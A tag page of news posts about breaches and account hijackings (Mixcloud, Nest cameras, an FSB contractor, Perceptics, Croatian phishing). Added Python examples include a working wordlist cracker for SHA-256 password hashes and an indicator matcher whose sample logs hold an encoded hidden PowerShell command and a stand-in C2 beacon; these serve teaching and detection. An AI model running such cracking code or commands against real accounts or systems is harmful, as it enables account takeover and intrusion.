Showing results for tags 'hacked'.

Found 30 results
  1. Facebook's Twitter and Instagram accounts hacked, 'OurMine' claims responsibility

Facebook’s Twitter and Instagram handles were compromised earlier today, as tweets and posts began showing up that said: “Well, even Facebook is hackable but at least their security better than Twitter”. A group called OurMine claimed responsibility for the hack; the same group was reportedly also responsible for the NFL’s Twitter account hack last month. The hackers began posting tweets from the Facebook and Messenger accounts, which were constantly being deleted by the company (as seen in Jane Manchun Wong’s tweet here). The accounts were compromised for about 30 minutes, after which they were locked.

Twitter confirmed in a statement to some journalists that the accounts were indeed compromised and that it was working with Facebook to restore them: “As soon as we were made aware of the issue, we locked the compromised accounts and are working closely with our partners at Facebook to restore them.” Facebook later posted in a tweet that it had “secured and restored” access. Interestingly, the hackers also seem to have taken control of the Facebook and Messenger Instagram handles (spotted by The Verge).

Though the hackers claimed that “Facebook” was hackable, it wasn’t Facebook itself that was hacked, but its social media accounts alone, such as Twitter and Instagram. The tweets by 'OurMine' were posted from 'Khoros', a third-party service that helps its customers interact with and post on social media, including Instagram and Twitter. From the tweets, it looks like the hackers were promoting their security services and did not seem to have any malicious intent.

Source: Facebook's Twitter and Instagram accounts hacked, 'OurMine' claims responsibility (Neowin)
  2. Breach Of Popular Audio Streaming Site Exposes 20 Million Accounts

The popular audio streaming site Mixcloud has reportedly been hacked. Account information belonging to as many as 22 million of its users is for sale on the Dark Web. Zack Whittaker of TechCrunch reports that the breach occurred earlier this month. The individual claiming responsibility for the breach provided Whittaker with a sample of the data, something hackers will often do to prove the validity of the ill-gotten data. In fact, the very same hacker contacted Whittaker in August to share details about a different breach. That incident involved StockX, a billion-dollar online marketplace that allows users to buy and sell shoes and clothing.

Whittaker reports that the hacker is asking 0.5 bitcoin (just under $3,900 at current rates) for the hacked Mixcloud data. While no payment card data was exposed this time around, the Mixcloud data does include email addresses, usernames, links to their profile photos, IP addresses and encrypted passwords. Mixcloud users do have something to be thankful for on that front: strong encryption. The company reportedly hashed its users’ passwords with SHA-2, a very strong cryptographic standard. As a result, well-chosen passwords will be nearly impossible to crack.

In a database with more than 20 million records, however, there’s a very high likelihood that many of the passwords are anything but difficult to guess. No matter how many times the worst passwords of the year get reported, people keep on using them. When a database like this one starts making the rounds, those weak passwords come back to haunt the users who chose them.

Mixcloud has yet to offer any official statement regarding the breach. An investigation will likely be forthcoming, however, as the London-based firm could be subjected to a fine of as much as £20 million or 4% of its annual turnover under GDPR guidelines. In one of the highest-profile GDPR incidents to date, hotel giant Marriott was hit with a whopping £99 million for a similar, albeit much larger, breach in 2018.

Source
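Added example, not part of the post above and not Mixcloud's code: a small Python demonstration of the point the post makes, that a plain SHA-256 hash protects a well-chosen password but not one from the yearly worst-passwords lists, and of what per-user salting does and does not change. The accounts, passwords, salts and wordlist are constructed here, and the names sha256_hex, crack_unsalted and crack_salted are this example's own.

```python
import hashlib
from typing import Dict, List, Tuple


def sha256_hex(data: str) -> str:
    return hashlib.sha256(data.encode()).hexdigest()


# Constructed sample accounts (not Mixcloud data). Three users picked passwords that appear in
# every attacker wordlist; one picked a long random string that no wordlist will ever contain.
SAMPLE_PASSWORDS: Dict[str, str] = {
    "alice": "123456",
    "bob": "password1",
    "carol": "qwerty",
    "dave": "V7#kq9!Lmz2$Wb8r",
}

# What an unsalted SHA-256 dump looks like: user -> hex digest of the bare password.
LEAKED_UNSALTED: Dict[str, str] = {u: sha256_hex(p) for u, p in SAMPLE_PASSWORDS.items()}

# What a per-user-salted dump looks like: user -> (salt, hex digest of salt + password).
# Salts are fixed strings here so the example is deterministic; real ones come from os.urandom.
LEAKED_SALTED: Dict[str, Tuple[str, str]] = {
    u: (f"s-{u}-0001", sha256_hex(f"s-{u}-0001" + p)) for u, p in SAMPLE_PASSWORDS.items()
}

# Tiny stand-in for the multi-million-entry wordlists attackers actually run.
WORDLIST: List[str] = ["123456", "password", "password1", "qwerty", "letmein", "iloveyou", "admin"]


def crack_unsalted(leaked: Dict[str, str], wordlist: List[str]) -> Tuple[Dict[str, str], int]:
    """Hash each candidate once and look it up against every user at the same time.
    Returns (user -> recovered password, number of SHA-256 computations)."""
    users_by_hash: Dict[str, List[str]] = {}
    for user, digest in leaked.items():
        users_by_hash.setdefault(digest, []).append(user)
    found: Dict[str, str] = {}
    for word in wordlist:
        for user in users_by_hash.get(sha256_hex(word), []):
            found[user] = word
    return found, len(wordlist)


def crack_salted(leaked: Dict[str, Tuple[str, str]], wordlist: List[str]) -> Tuple[Dict[str, str], int]:
    """With per-user salts each candidate must be rehashed for every user, so the work scales
    with users x words instead of words. The weak passwords still fall; only the cost changed."""
    found: Dict[str, str] = {}
    ops = 0
    for user, (salt, digest) in leaked.items():
        for word in wordlist:
            ops += 1
            if sha256_hex(salt + word) == digest:
                found[user] = word
                break  # stop at the first hit for this user
    return found, ops


if __name__ == "__main__":
    print("unsalted:", crack_unsalted(LEAKED_UNSALTED, WORDLIST))
    print("salted:  ", crack_salted(LEAKED_SALTED, WORDLIST))
```

Both runs recover the same three accounts; the salted dump merely costs more hash computations per recovered account, and with a fast hash such as SHA-256 that cost is negligible on a GPU. What actually raises the price per guess is a deliberately slow, memory-hard password hash (scrypt, bcrypt, Argon2), which is why "hashed with SHA-2" is weaker reassurance than the post makes it sound.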
  3. A glitch with Keretapi Tanah Melayu Bhd (KTMB)’s online ticketing system caused severe disruptions during the first day of advanced ticket sales on Monday, and measures are already being put in place to avoid a repeat situation.

According to The Malaysian Reserve, Chief Executive Officer Datuk Kamarulzaman Zainal said that the main cause of the disruption was the sheer volume of users attempting to buy tickets. This was exacerbated by around 400,000 visitors on the site, with 30,000 transactions being completed on Monday. To better handle the load in the future, the CEO said that KTMB’s internet bandwidth capacity is being doubled from 100Mbps, while they will also be making improvements to the centralised processing unit of the system.

But Kamarulzaman isn’t ruling out the possibility of a more nefarious motive at work here. According to an NST report:

Given the lack of any more information regarding this, perhaps the CEO was merely listing out all potential causes of the overload. Regardless, more conclusive news will (hopefully) arrive at the end of the investigation.

It also appears that the server overload caused by online purchasers led to severe delays for over-the-counter ticket customers as well, with up to 2-hour waits reported. Currently, KTMB is selling 1.2 million tickets for the Electric Train Service (ETS) and inter-city trains, with dates ranging from December 1 to February 29 2020. Despite the issues, 77,000 tickets were still sold on the first day of sales.

Source: KTMB to investigate hacking as possible cause of online ticketing glitch (via SoyaCincau)
  4. In this day and age, online account security is constantly under attack by nefarious parties that are looking to settle scores, make a few bucks, or simply make a name for themselves. 2K Games found this out the hard way last night after a number of its social media accounts were hacked in a massive security breach for the game publisher. Not only was the company's Facebook account compromised, but its Twitter profile was also taken over by foul-mouthed pranksters. One social media account being compromised is bad enough, but this was a coordinated attack across multiple mediums, which is a much more troubling security problem for 2K Games.

Messages posted to Facebook and Twitter consisted primarily of inflammatory and racist messages across numerous 2K Games properties, including the publisher’s primary Facebook page, and pages for Borderlands and WWE 2K. There were even posts referring to the size of one's... well, "member". Needless to say, it's a rather childish prank, and one that is at face value embarrassing for 2K Games. The perpetrators gave a shout out to the Chuckling Squad, which previously claimed responsibility for hacking Jack Dorsey's Twitter account. We have no idea if Chuckling Squad is truly responsible for these hacks, or if it's just another party looking to have some fun at the group's expense.

As of this writing, 2K Games appears to have gotten its social media accounts back under its own control. At the very least, we hope that the company's social media account managers have switched to more secure passwords and enabled two-factor authentication.

Source: 2K Games' Twitter And Facebook Accounts Were Hacked And It’s Ugly (via Hot Hardware)
  5. A father Googled “Nest + camera + hacked” and found out that this happens frequently

It was an unremarkable Wednesday afternoon when our nanny texted my wife and me asking if we were speaking through one of the Nest cameras in our house. We both replied that we were not. Then the nanny texted that a voice was coming through the kitchen camera and using bad words. I immediately pulled up the video feed and began reviewing: I hear the familiar chime, which means someone is about to talk through the camera. Then, to my horror, a female voice that I don’t recognize starts talking to my 18-month-old son. He looks around the room and then at the ceiling, wondering who’s there. It feels as though my heart is about to beat through my chest. The blood rushes to my face. I am completely helpless.

The voice is laughing when it chimes in. She says we have a nice house and encourages the nanny to respond. She does not. The voice even jokes that she hopes we don’t change our password. I am sick to my stomach. After about five minutes of verbal “joy riding,” the voice starts to get agitated at the nanny’s lack of response and then snaps, in a very threatening voice: “I’m coming for the baby if you don’t answer me, bi**ch!” My jaw drops. We unplug the cameras and change all passwords. The nanny has taken our son to the park down the street in an effort to escape. However, the damage has been done.

Still helpless, I started doing the only thing I could do: Googling. I typed “Nest + camera + hacked” and found out that this happens frequently. Parent after parent relayed stories similar to mine (threatening to steal a baby is shockingly common) and some much worse, such as playing pornography over the microphone to a 3-year-old. I dove deeper to find out how this could have happened. Essentially, an email and a password are compromised somewhere across the internet. They join millions of other email addresses and passwords, which are then cross-referenced with other websites, including Nest. When a match is found, any novice can jump on and terrorize with little to no technical background. What is worse is that anyone could have been watching us at any time for as long as we have had the cameras up. This person just happened to use the microphone. Countless voyeurs could have been silently watching (or worse) for months.

However, what makes this issue even more terrifying is a corporate giant’s complete and utter lack of response. Nest is owned by Google, and, based on my experience and their public response, Google does not seem to care about this issue. They acknowledge it as a problem, shrug their shoulders and point their fingers at the users. Their party line is to remind people that the hardware was not hacked; it was the user’s fault for using a compromised password and not implementing two-step authentication, in which users receive a special code via text to sign on.

That night, on my way home from work, I called Nest support and was on hold for an hour and eight minutes. I followed all directions and have subsequently received form emails in broken English. Nobody from Google has acknowledged the incident or responded with any semblance of empathy. In every email, they remind me of two-step authentication. They act as if I am going to continue to use Nest cameras. I am reminded of Google’s former motto: “Don’t be evil” (now buried in literally the last sentence of their code of conduct). It is not evil to bring a product to market before the privacy has been completely figured out, but it is evil to let someone threaten to kidnap an 18-month-old and have no real response.

Maybe privacy is a thing of the past. Maybe trolls on the internet are everywhere. Or maybe an almost trillion-dollar company needs to hire a few more developers focused on security and a few more customer service representatives to help parents cope when anonymous, sadistic people terrorize their users. Or maybe Google buried its former motto for a reason.

Source
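Added example, not part of the post above and not Nest or Google code: the account matching the author describes (a stolen email:password list replayed against another site until one pairs up) is credential stuffing, and it leaves a distinctive trace in the target service's authentication log: one source trying many different accounts in a short burst, mostly failing. The Python below runs a simple sliding-window detector over a constructed log (documentation IP ranges, made-up usernames) and reports which accounts the stuffing run actually got into. The log format, the function names parse and detect_stuffing, and the thresholds are assumptions for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed authentication log (not a real Nest log). 192.0.2.10 is a legitimate user who
# mistypes her password twice; 198.51.100.23 walks a stolen email:password list and gets two hits.
SAMPLE_AUTH_LOG = """\
2019-12-04T14:00:01Z src=192.0.2.10 user=alice result=FAIL
2019-12-04T14:00:09Z src=192.0.2.10 user=alice result=FAIL
2019-12-04T14:00:20Z src=192.0.2.10 user=alice result=OK
2019-12-04T14:02:00Z src=192.0.2.11 user=bob result=OK
2019-12-04T14:05:00Z src=198.51.100.23 user=alice result=OK
2019-12-04T14:05:01Z src=198.51.100.23 user=bob result=FAIL
2019-12-04T14:05:02Z src=198.51.100.23 user=carol result=FAIL
2019-12-04T14:05:03Z src=198.51.100.23 user=dave result=FAIL
2019-12-04T14:05:04Z src=198.51.100.23 user=erin result=FAIL
2019-12-04T14:05:05Z src=198.51.100.23 user=frank result=OK
2019-12-04T14:05:06Z src=198.51.100.23 user=grace result=FAIL
2019-12-04T14:05:07Z src=198.51.100.23 user=heidi result=FAIL
"""

# Assumed line format; adapt the pattern to the real service's log.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$"
)


def parse(log_text: str) -> List[dict]:
    """Turn log lines into events; lines that do not match the format are skipped, not guessed."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "src": m["src"],
            "user": m["user"],
            "ok": m["result"] == "OK",
        })
    return events


def detect_stuffing(events: List[dict], window: timedelta = timedelta(minutes=10),
                    min_users: int = 5, max_success_rate: float = 0.5) -> Dict[str, List[str]]:
    """Flag a source that, inside one sliding window, tried at least min_users distinct accounts
    with a success rate of at most max_success_rate. A person who forgot a password hits one
    account many times; a stuffing list hits many accounts once each and mostly fails.
    Returns {src: sorted accounts that logged in successfully from that source}, which are the
    accounts whose leaked credentials matched and need a forced reset."""
    by_src: Dict[str, List[dict]] = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)

    matched: Dict[str, List[str]] = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            # Advance the window start until the span evs[start..end] fits inside the window.
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            win = evs[start:end + 1]
            if len({e["user"] for e in win}) < min_users:
                continue
            if sum(e["ok"] for e in win) / len(win) <= max_success_rate:
                matched[src] = sorted({e["user"] for e in evs if e["ok"]})
                break
    return matched


if __name__ == "__main__":
    for src, accounts in detect_stuffing(parse(SAMPLE_AUTH_LOG)).items():
        print(f"{src}: credential stuffing; matched accounts {accounts}")
```

Real stuffing runs rotate through proxy pools, so a production detector keys on more than the source address (ASN, user agent, device fingerprint, or simply the global rate of distinct-account failures) and feeds the matched accounts into forced password resets, session revocation and a 2FA prompt; the per-IP version above is the minimum that would have surfaced the login the author's family experienced.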
  6. London's Metropolitan Police has apologised after its Twitter, emails and news pages were targeted by hackers and began pumping out a series of bizarre messages. After a series of messages late last night that read simply "test" or seemingly random letters, the police sites began using foul language with anti-police sentiment and calling for a jailed rapper to be released. "Free Digga D," said one such message. The Met Police's Twitter account has 1.22 million followers.

Scotland Yard police headquarters said its internal IT infrastructure had not been hacked, explaining the issue was limited to its press office's online provider, MyNewsDesk, which put news releases online to the public. "Unauthorised messages appeared on the news section of our website," it said, as well as on its Twitter feed and emails. "We apologise to our subscribers and followers for the messages they have received. We are confident the only security issue relates to access to our MyNewsDesk account. We have begun making changes to our access arrangements to MyNewsDesk," it said. "There has been no 'hack' of the Met Police's own IT infrastructure. We are assessing to establish what criminal offences have been committed."

US President Donald Trump weighed in, reigniting his long-running war of words with London Mayor Sadiq Khan while retweeting an image of the hijacked Metropolitan Police account. "With the incompetent Mayor of London, you will never have safe streets!" he tweeted.

Drill music artist Digga D, real name Rhys Herbert, was jailed last year aged 17 along with four other members of his gang, after they were caught with baseball bats and machetes on their way to attack rivals. The drill genre of rap music, which often features masked or hooded groups of men talking about guns, drugs and stabbings, has been linked to a rise in violent crime in the capital. Besides his jail term, Herbert was given a three-year criminal behaviour order restricting him from making music with violent lyrics.

Source
  7. Hackers breach FSB contractor, expose Tor deanonymization project and more

SyTech, the hacked company, was working on research projects for the FSB, Russia's intelligence service.

Hackers have breached SyTech, a contractor for the FSB, Russia's national intelligence service, from where they stole information about internal projects the company was developing on behalf of the agency, including one for deanonymizing Tor traffic. The breach took place last weekend, on July 13, when a group of hackers going by the name of 0v1ru$ hacked into SyTech's Active Directory server, from where they gained access to the company's entire IT network, including a JIRA instance. The hackers stole 7.5TB of data from the contractor's network, and they defaced the company's website with a "yoba face," an emoji popular with Russian users that stands for "trolling."

The hackers posted screenshots of the company's servers on Twitter and later shared the stolen data with Digital Revolution, another hacking group, who last year breached Quantum, another FSB contractor. This second hacker group shared the stolen files in greater detail on their Twitter account on Thursday, July 18, and with Russian journalists afterward.

FSB's secret projects

Per the different reports in Russian media, the files indicate that SyTech had worked since 2009 on a multitude of projects for FSB unit 71330 and for fellow contractor Quantum. Projects include:

  • Nautilus - a project for collecting data about social media users (such as Facebook, MySpace, and LinkedIn).
  • Nautilus-S - a project for deanonymizing Tor traffic with the help of rogue Tor servers.
  • Reward - a project to covertly penetrate P2P networks, like the one used for torrents.
  • Mentor - a project to monitor and search email communications on the servers of Russian companies.
  • Hope - a project to investigate the topology of the Russian internet and how it connects to other countries' networks.
  • Tax-3 - a project for the creation of a closed intranet to store the information of highly-sensitive state figures, judges, and local administration officials, separate from the rest of the state's IT networks.

BBC Russia, who received the full trove of documents, claims there were other older projects for researching other network protocols such as Jabber (instant messaging), ED2K (eDonkey), and OpenFT (enterprise file transfer). Other files posted on the Digital Revolution Twitter account claimed that the FSB was also tracking students and pensioners.

Some projects came to be, were tested

But while most of the projects look to be just research into modern technology, which all intelligence services carry out, there are two that appear to have been tested in the real world. The first was Nautilus-S, the one for deanonymizing Tor traffic. BBC Russia pointed out that work on Nautilus-S started in 2012. Two years later, in 2014, academics from Karlstad University in Sweden published a paper detailing the use of hostile Tor exit nodes that were attempting to decrypt Tor traffic. Researchers identified 25 malicious servers, 18 of which were located in Russia, and running Tor version, the same one detailed in the leaked files. The second project is Hope, the one which analyzed the structure and make-up of the Russian segment of the internet. Earlier this year, Russia ran tests during which it disconnected its national segment from the rest of the internet.

SyTech, the hacked company, has taken down its website since the hack and refused media inquiries.

Source: Hackers breach FSB contractor, expose Tor deanonymization project and more
  8. Few people had ever heard of Perceptics, a Tennessee-based subcontractor that sells license plate readers to U.S. Customs and Border Protection, before last month, when news emerged that the company had been hacked and that sensitive data — including images of license plates and drivers — had been released on the dark web. The hack is just the sort of privacy breach that civil liberties advocates have long warned could come from massive government data collection, especially when it is contracted out to private firms. And it comes at a time when the CBP is under scrutiny for monitoring activists and journalists at the U.S.-Mexico border and airports. Yet while photos of faces and license plates of some 100,000 U.S. drivers are now freely available online, the CEO of Perceptics, John Dalton, claimed in an email a few years ago that “CBP has none of the privacy concerns at the border that all agencies have inland.” Writing to one of his company’s lobbyists in 2013, Dalton suggested that the border agency offered Perceptics an opportunity to make greater use of license plate images, stating, “Data mining and looking at traffic patterns/abnormalities are strong analytics for CBP, and could be for others.” Dalton appeared to be referring to the CBP’s relatively unfettered powers of search and seizure within 100 miles of the border. In contrast, for agencies other than CBP, “there is much concern with ACLU state level lawsuits and elsewhere around privacy issues, so this is a live challenge,” he wrote. Dalton’s email and other internal documents laying out Perceptics’ strategy to politically defend its products are among the data taken from the company by an anonymous hacker and analyzed by The Intercept. “Obviously, we don’t agree with the blanket assertion that there are no privacy concerns at the border,” said Nate Freed Wessler, of the American Civil Liberties Union’s Speech, Privacy, and Technology Project. 
“The government position is that they have latitude to do whatever they want there, and we vigorously disagree with that.” Wherever they are used, said Wessler, license plate readers, or LPRs, are concerning when the data they collect is retained and analyzed, providing a gold mine of location information as people go about their daily lives in their cars. “Especially for people who live in border communities, who live binational lives, it can really be sensitive information,” he said. And as the Perceptics hack shows, data that is retained is also vulnerable to unintended release or use, whether by hackers or unscrupulous government employees or contractors. Dalton’s emails distinguish between analyzing data and merely capturing it but suggest that Perceptics could be in the business of both. In response to the suggestion by an industry colleague that they “need to really hit back hard on separating technology with policy (data collection vs. data use)” in order to ward off privacy concerns, Dalton wrote, “Perceptics can do anything any of these extremes want and everything in between. That is just the kind of customer friendly company we are.” He continued, “For CBP, we do not host any data at all, as we are a complex sensor; for the Pentagon, the vehicle data is hosted/stored on our provided hardware/software solution, database and user interface. In any system, the data can be dumped just about under any set of timing or other conditions.” In early July, CBP suspended Perceptics from receiving any further contracts with the federal government, citing “evidence of conduct indicating a lack of business honesty or integrity.” The suspension apparently came because the company “had transferred copies of license-plate and traveler images onto its private network in violation of agency rules,” according to the Washington Post. 
A CBP official told the paper that Perceptics was trying to “refine its algorithms to match license plates with the faces of a car’s occupants, which the official said was outside of CBP’s sanctioned use.” Neither CBP nor Perceptics responded to questions from The Intercept. Reached for comment, Cristina Antelo, a lobbyist who has worked with Perceptics for over a decade as part of the Podesta Group and at her own shop, said that the company’s position on privacy has always been about the distinction between the technology, which Perceptics provides, and its use, which is determined by the customer. When she spoke with members of Congress, she said, “The question was always what happens to that data: Who has access to it, where is it stored? Does ICE get access to it? How long would you keep it? Our response at that time is that those are all valid policy concerns, and that is a policy issue for Congress to determine.”

Preempting Privacy Concerns

Perceptics nonetheless showed a strong interest in shaping Congress’s determinations around license plate policy. The company engaged in years of lobbying to preempt criticism of its products from privacy advocates, insisting that what happened to the data that its license plate readers captured was none of its business, even as the company worked on controversial trials pairing its camera systems with other companies’ facial recognition products. Perceptics staff and lobbyists tracked the reaction to stories about ICE gaining access to license plate databases and the DEA building them out, the emails show. In monthly reports spanning several years, the Podesta Group detailed its work on appropriations bills and other spending vehicles.
In 2014, for instance, Podesta Group representatives mentioned monitoring legislation regulating location data collection, saying that their staff would “preemptively meet if necessary to ensure LPRs do not get drawn further into the privacy conversation.” In 2015, Podesta Group representatives spoke about building a “possible coalition against LPR bans,” according to one of the reports. After Donald Trump took office, Antelo and other Podesta staff provided updates on government negotiations over border spending, which sometimes raised the concern that Trump’s hard-line immigration demands would end up scuttling spending on technology and hurt her clients’ bottom line. “A Trump presidency doesn’t guarantee a bonanza for Perceptics,” Antelo wrote in a January 2017 email to a Perceptics executive, noting the administration’s pledge to cut budgets. “We might want to do some pre-emptive defense of Perceptics’ programs early on, in addition to affirmatively pushing for more funding,” she continued. In an October 2017 update, Podesta staffer Lucia Alonzo wrote that the administration was holding “to the idea of a southern border wall — there is little mention of other types of technology and infrastructure.” Their job, she said, “continues to be ensuring our LPR language is in any future compromise package.” In a February 2018 email, Antelo described meetings with staffers for Democrats Peter Aguilar, a California congressman, and Michael Bennet, a Colorado senator and presidential candidate: “Both staffer brought up privacy and data mgmt concerns generally and seemed content with the response that we have no input as to how the data is managed and that it is a valid policy discussion for CBP.” Antelo wrote that when Bennet’s staff asked “about privacy and security of LPR data Perceptics camera captures, we gave them the standard response.” Staffers for Democratic Sen. Bob Menendez, of New Jersey, on the other hand, “assured us their office has no objection to LPRs. 
In the larger discussion of DACA/border security, they said they don’t really have a problem with border tech, but rather dramatic stuff like the wall.” “Michael’s staff raised flags about the privacy risks associated with license plate reader technology and the recent data breach appears to bear out their concerns,” according to Courtney Gidner, a spokesperson for Bennet. “This event has underscored the risks of collecting such information in the first place and how it is stored and protected.” (The offices of Aguilar and Menendez did not respond to requests for comment.)

About-Face

Antelo insisted that Perceptics “makes cameras, really good cameras, and we sell cameras. We do not do facial recognition, we never have and are not developing it.” But recent emails make clear that Perceptics was at the very least involved in trials to work with other companies that do perform facial recognition. The company worked on a pilot for CBP’s “Vehicle Face System,” which, as reported by The Verge last year, was aimed at scanning drivers’ faces through the windshields of their cars, in order to match drivers with the photos on file in government databases. Emails and other Perceptics documents reference work with Unisys, another contractor, on the project. One email discussing Perceptics’ success in identifying people in cars for policing HOV lanes references “a CBP project” that was “touting high match rates using facial recognition.” In June 2018, an email chain about naming “new products for our borders market” referenced efforts they called “Face Find” and “Face at Speed.” The suggested names from one employee? “1. Big Brother 2. Voyeur 3. Mug shot 4. Head shot 5. paparazzo.” In Brownsville, Texas, in December 2018, a Perceptics employee was instructed to “hold off on the face cam for the moment.
We didn’t have permission to install that in Brownsville, and with privacy concerns we need to do some thinking before we install any face capture utilities within the CBP facilities.” “We’ve never had full insight into what CBP is collecting and what they are storing, and what piece of the puzzle each subcontractor has,” said Neema Singh Guliani, a senior legislative counsel with the ACLU. But, she said, although CBP has rolled out face recognition technology in airports and at pedestrian crossings, for her, there are “big questions about whether CBP has explicit authority to use face recognition.” “Technology that is used at the border doesn’t stay at the border,” said Mana Azarmi, policy counsel with the Center for Democracy and Technology. “Automatic license plate readers are fairly ubiquitous, and if they manage to attach the software to these cameras and get readable images, then it spreads, we have the ability for law enforcement to do real-time facial recognition of drivers which is something we’ve always warned of.” Perceptics was alert to the controversy and impending policy changes around face recognition. In August 2018, Alonzo flagged Sen. Kamala Harris, another Democratic presidential contender, for her “interest in privacy and data security surrounding these technologies.” She said that she would track the progress of the legislation Harris had introduced “for any potential impact on Perceptics’ work with facial recognition firms,” and added “we’ll also track reactions to see who else might extend their privacy/data security concerns to technologies like LPRs, and conduct preemptive outreach.” Source
  9. This is the same exchange that reportedly sold Mt Gox’s bitcoin last year on behalf of its trustee.

Japanese crypto exchange Bitpoint has become the latest exchange to suffer a major loss of funds. Its loss of $32 million, in five cryptocurrencies, was announced today. The majority of the coins stolen were from customer funds, with just over a quarter belonging to the exchange itself. The funds stolen were in bitcoin, ethereum, XRP, litecoin and bitcoin cash. Bitpoint has not yet said whether customers’ funds will be recouped. Hacked exchanges typically choose to pay back stolen funds, rather than declare bankruptcy, given that they can cover the costs.

This is not the first serious hack Japan has seen. The nation was an early adopter, and so suffered some of the earliest hacks, notably Mt. Gox, which lost $350 million back in 2014. In a strange twist, Bitpoint may also be the same exchange that sold $318 million of Mt. Gox’s coins last year. These were sold by trustees on behalf of the exchange with the original intent of paying back creditors in the fiat equivalent of the bitcoin they lost. Many believed this helped to sink the prices of cryptocurrencies across the board, and was a harbinger for the long crypto winter. According to bank documents revealed on a website called GoxDox, the trustee who sold the coins received millions of dollars from Bitpoint, implying that it was the exchange of choice for the sale of coins.

Source
  10. Croatian government targeted by mysterious hackers Government agencies targeted with never before seen malware payload — named SilentTrinity. A mysterious hacker group has targeted, and most likely infected, Croatian government employees between February and April this year. Attackers, which are suspected to be a state-sponsored unit, have targeted victims using a spear-phishing campaign that mimicked delivery notifications from the Croatian postal or other retail services. Emails contained a link to a remote website with a lookalike URL, where users were asked to download an Excel document. Users targeted with never-before-seen malware The document was laced with malicious code packed as a macro script which appeared to have been largely copied off the internet, from various tutorials or open source projects hosted on StackOverflow.com, Dummies.com, Issuu.com, Rastamouse.me, or GitHub.com. The macro script, if enabled by the victim, would download and install malware on their systems. Two different sets of malware payloads were detected during these attacks. The first was the Empire backdoor, a component of the Empire post-exploitation framework, a penetration testing utility. The second was SilentTrinity, another post-exploitation tool, similar to the first. In a presentation at the Positive Hack Days (PHDays) security conference in May, Alexey Vishnyakov, a Senior Specialist in Threat Analysis for cyber-security firm Positive Technologies, said this was the first time when a malicious threat actor had weaponized the SilentTrinity tool in an active malware distribution campaign. Croatian government detected the attacks in April While they went under the radar for two months, the phishing attacks were eventually detected in early April. The Information Systems Security Bureau (ZSIS), the central state authority responsible for the cyber-security of the Republic of Croatia state bodies, issued two separate alerts about the attacks [1, 2]. 
The state cyber-security agency shared indicators of compromise, such as file names, registry keys, URLs, and IP addresses for the attackers' command and control (C&C) servers, asking state agencies to check logs and scan computers for potential infections. "The Croatian Post has already taken steps to remove the malicious web sites and servers, but both malware versions are currently active," the agency said. "With this malware, attackers can take control over a computer and execute arbitrary commands under the authority of the user who opened the XLS file and enabled the macro commands to execute." In a report published today, Vishnyakov pointed out certain connections between the C&C servers used in this campaign targeting Croatian government agencies and past malware distribution operations. The most important is a FireEye report about hackers using a WinRAR vulnerability to infect government targets in Ukraine with the same Empire backdoor, using the same C&C server. While FireEye never attributed those attacks to a specific hacker group, the targeting of the Ukrainian government is specific to Russian threat actors, who have been targeting the country's officials and government agencies since 2014, when Russian troops invaded the Crimean peninsula. While Vishnyakov refrained from attributing these attacks to a specific threat actor, the researcher did note that "the available data on hosts, addresses, and domains used, as well as the high number of connections between them, suggests a large-scale malicious effort." Source: Croatian government targeted by mysterious hackers
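The ZSIS alerts asked agencies to check logs against published indicators of the kinds listed above (file names, registry keys, URLs and C&C IPs). The script below is an added example of that check, not tooling from ZSIS or Positive Technologies: every indicator value and every log line in it is constructed for the demo, and the three log formats (proxy, registry event, process creation) are assumptions about what a site would have on hand.

```python
"""Match ZSIS-style indicators (file names, registry keys, domains, C&C IPs)
against a few log sources. Added example; all indicators and log lines are
constructed, and the log formats are assumptions."""
import re

# Constructed indicator set keyed by type. Real values came from the ZSIS alerts.
IOCS = {
    "ip": {"192.0.2.44"},
    "domain": {"posta-hr-dostava.example"},
    "file": {"dostava_obavijest.xls"},
    "registry": {r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\updater"},
}

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RE = re.compile(r"https?://([^/:\s]+)")

# Constructed logs: (source type, raw line).
SAMPLE_LOGS = [
    # proxy: ts client method url status
    ("proxy", "2019-03-12T09:14:02Z 10.1.4.23 GET http://posta-hr-dostava.example/track/obavijest.xls 200"),
    ("proxy", "2019-03-12T09:20:11Z 10.1.4.23 POST http://192.0.2.44/admin/get.php 200"),
    ("proxy", "2019-03-12T09:21:00Z 10.1.4.99 GET https://www.example.org/ 200"),
    # registry events: ts host op key
    ("registry", "2019-03-12T09:15:40Z WS-023 SetValue HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\updater"),
    ("registry", "2019-03-12T09:15:41Z WS-023 SetValue HKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\VBAWarnings"),
    # process creation: ts host image cmdline
    ("process", "2019-03-12T09:15:02Z WS-023 EXCEL.EXE \"C:\\Users\\ana\\Downloads\\dostava_obavijest.xls\""),
    ("process", "2019-03-12T09:15:05Z WS-023 powershell.exe -nop -w hidden -enc SQBFAFgA"),
]


def match_line(source, line, iocs=IOCS):
    """Return sorted (ioc_type, value) pairs found in one log line."""
    hits = set()
    if source == "proxy":
        # Hostnames are matched exactly; IPs anywhere in the line (URL or client field).
        for host in HOST_RE.findall(line):
            if host in iocs["domain"]:
                hits.add(("domain", host))
        for ip in IP_RE.findall(line):
            if ip in iocs["ip"]:
                hits.add(("ip", ip))
    elif source == "registry":
        key = line.split(" ", 3)[-1]  # everything after ts, host, op
        if key in iocs["registry"]:
            hits.add(("registry", key))
    elif source == "process":
        lowered = line.lower()  # file names on Windows are case-insensitive
        for name in iocs["file"]:
            if name.lower() in lowered:
                hits.add(("file", name))
    return sorted(hits)


def scan(logs, iocs=IOCS):
    """Map each matching log line to its indicators; lines with no hit are dropped."""
    report = []
    for source, line in logs:
        hits = match_line(source, line, iocs)
        if hits:
            report.append({"source": source, "line": line, "iocs": hits})
    return report


if __name__ == "__main__":
    for entry in scan(SAMPLE_LOGS):
        print(entry["source"], entry["iocs"])
        print("   ", entry["line"])
```

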